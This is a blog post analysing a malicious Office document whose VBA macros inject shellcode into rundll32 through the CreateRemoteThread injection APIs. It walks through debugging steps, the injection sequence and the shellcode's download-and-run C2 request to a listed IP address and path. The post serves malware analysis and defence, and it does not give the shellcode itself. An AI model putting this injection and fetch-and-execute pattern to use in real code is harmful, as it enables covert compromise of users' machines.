Maldocs and shellcode
By Filip Olszak
This is a continuation of the Maldocs payload extraction post, with a deeper dive into one particular shellcode-enabled document.
In the previous post we looked into a few quick wins for dynamic payload extraction from Office maldocs, using the Office VBA editor, x64dbg and AMSI. While these techniques together with static code review should be sufficient when working with most samples, many exceptions can make the analysis a bit more demanding— one such exception is shellcode.
We can find malicious documents leveraging shellcode using the below VirusTotal query:
type:doc p:10+ code injection
In my search this "50.doc" stood out the most with 33 vendors flagging it as malicious. The document contains several VBA modules, and in one we quickly find what appears to be a shellcode array.
Keeping in mind that it may or may not be stored in an XOR’ed / encrypted form, any attempt at conversion and extraction through VBA scripting would have to be done after decryption routines have ran. Instead we are going to take a shortcut and use x64dbg with Process Hacker later on to grab the instructions directly from target memory segment.
Another thing we notice is that the sample references 4 WinAPIs it is going to use to accomplish the injection.
Each function receives a VBA function alias which will be used later in the code to perform the associated API call.
The first call — to
RunStuff (CreateProcessA)takes variable a
sProcfor command line of the new process. Contents of
sProcare heavily obfuscated, but placing a break point on the next instruction and running the module will allow us to read the clear-text command line, which is either
depending on the system architecture.
This is going to be the process where a new
PAGE_EXECUTE_READWRITEmemory segment will be allocated, as indicated by the
0x40memory protection constant passed to
Next a For loop is used to iterate through the discovered array of bytes, passing those one by one over to
CreateRemoteThreadis used to initiate execution of the shellcode.
We now have enough intel to set a breakpoint on calls to
kernel32_WriteProcessMemory, in order to identify the newly allocated memory segment where the shellcode is about to get populated.
After reaching the call and consulting MSDOCS we know that the
RDXregister holds a pointer to the
lpBaseAddresswhich is the beginning of our shellcode memory page —
We can also confirm that
WINWORD.EXEhas already spawned
rundll32.exein a suspended state.
Browsing through memory pages of that process, the page at
0x2e80000clearly sticks out with it’s
Private: Commitallocation type and
Looking at the memory contents of that region, it contains our first hex byte
At this point we have successfully identified the memory space where the shellcode will be written.
We can now disable the breakpoint on
kernel32_WriteProcessMemory, and add a new breakpoint on
kernel32_CreateRemoteThread. The execution can then be resumed to let the malware copy over all of the assembly.
We can already see some interesting strings in the raw contents
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Process Hacker allows us to save the identified memory segment, which we can further reverse and debug.
Looking up the IP address on VT confirms it is indeed known for getting comms from several maldocs — including our 50.doc.
Shellcode is usually a bit of position-independent code, expected to be able to successfully accomplish it’s tasks, regardless of where in memory it resides. To make the debugging easier, we want to add this machine code to some sort of a shellcode harness, converting it into a PE will greatly increase the amount of tools we can use.
After we have the executable ready, we can drop it into x64dbg.
At the very beginning of the code we notice multiple instructions that are very typical of memory position-independent malware referencing structures stored at known relative offsets — first the Thread Information Block (TIB) structure (FS/GS segment register) to get address of the Process Environmental Block (PEB) at offset
+0x30, and later other structures needed for things like dynamically loading libraries.
0x00c _PEB_LDR_DATA* Ldr;
0x014 void* SubSystemData;
0x028 DWORD EnvironmentUpdateCount;
We then go through decryption routines loading our strings — like the file system path to the process image, names of WinAPI and libc functions.
Finally we see it loading
wininetby jumping to
LoadLibraryAaddress held in
Later on the same loader function is used to initialize use of
wininet.InternetOpenA, and open an HTTP comms channel with our C2, over remote
HINTERNET hInternet == 4, //wininet instance handle
LPCSTR lpszServerName == 10.1.198.18,
INTERNET_PORT nServerPort == 22B8,
DWORD dwService == 3,
From a call to
wininet.HttpOpenRequestAwe learn that it requests the /OOmQ path, and a call to
wininet.HttpSendRequestAuses the User-Agent string found earlier.
HINTERNET hConnect == 8,
LPCSTR lpszObjectName == "/OOmQ",
HINTERNET hRequest == 00CC000C,
LPCSTR lpszHeaders == "User-Agent: Mozilla/5.0 ...",
DWORD dwHeadersLength == FFFFFFFF,
If the request to
hxxp://10.1.198.17:8888/OOmQtimes out, the process exits
We are not going to attempt analysis of that file, but if we wanted to further investigate what the shellcode is doing with it, we can serve our own PE file on this address, and see how it’s processed by the shellcode.
To do this we can use Fiddler AutoResponder conditional rules and a random EXE.
The file is requested and returned to the shellcode process
VirtualAllocallocates new memory region with
RWXprotection. The same region then receives the remote file from
And all is clear